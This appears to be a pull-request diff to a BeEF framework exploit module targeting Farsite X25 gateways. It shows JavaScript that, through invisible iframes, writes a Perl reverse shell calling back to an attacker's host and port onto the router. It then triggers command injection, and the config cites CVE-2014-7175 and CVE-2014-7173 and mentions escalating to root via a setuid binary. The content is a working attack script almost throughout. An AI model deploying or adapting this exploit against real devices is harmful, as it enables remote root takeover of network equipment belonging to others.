Update PR #1301

modules/exploits/farsite_x25_remote_shell/command.js

@@ -6,22 +6,16 @@ beef.execute(function() {
   var lhost = '<%= @lhost %>';
   var lport = '<%= @lport %>';
 
-
-
   writefile = function() {
     var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}';
     revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");';
     revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};';
-    //var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe();
     var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe();
     var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell;
     //About to hit uri
     x25w_<%= @command_id %>.setAttribute('src', uri);
   };
 
-  validate = function() {
-  };
-
   exploit = function() {
     //Command injecting on the router
     var x25e_<%= @command_id %> = beef.dom.createInvisibleIframe();
@@ -31,7 +25,7 @@ beef.execute(function() {
 
   try {
     writefile();
-    setTimeout(exploit,3000);
+    setTimeout(exploit,5000);
   } catch (e) {
     beef.debug(peer + " - Exploit failed: " + e.message);
   }

modules/exploits/farsite_x25_remote_shell/config.yaml

@@ -5,7 +5,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "Farsite X25 gateway remote code execution"
-            description: "This module exploits CVE-2014- to write a payload to the router and CVE-2014- to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
+            description: "This module exploits CVE-2014-7175 to write a payload to the router and CVE-2014-7173 to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
             authors: ["Wireghoul"]
             target:
                 working: ["All"]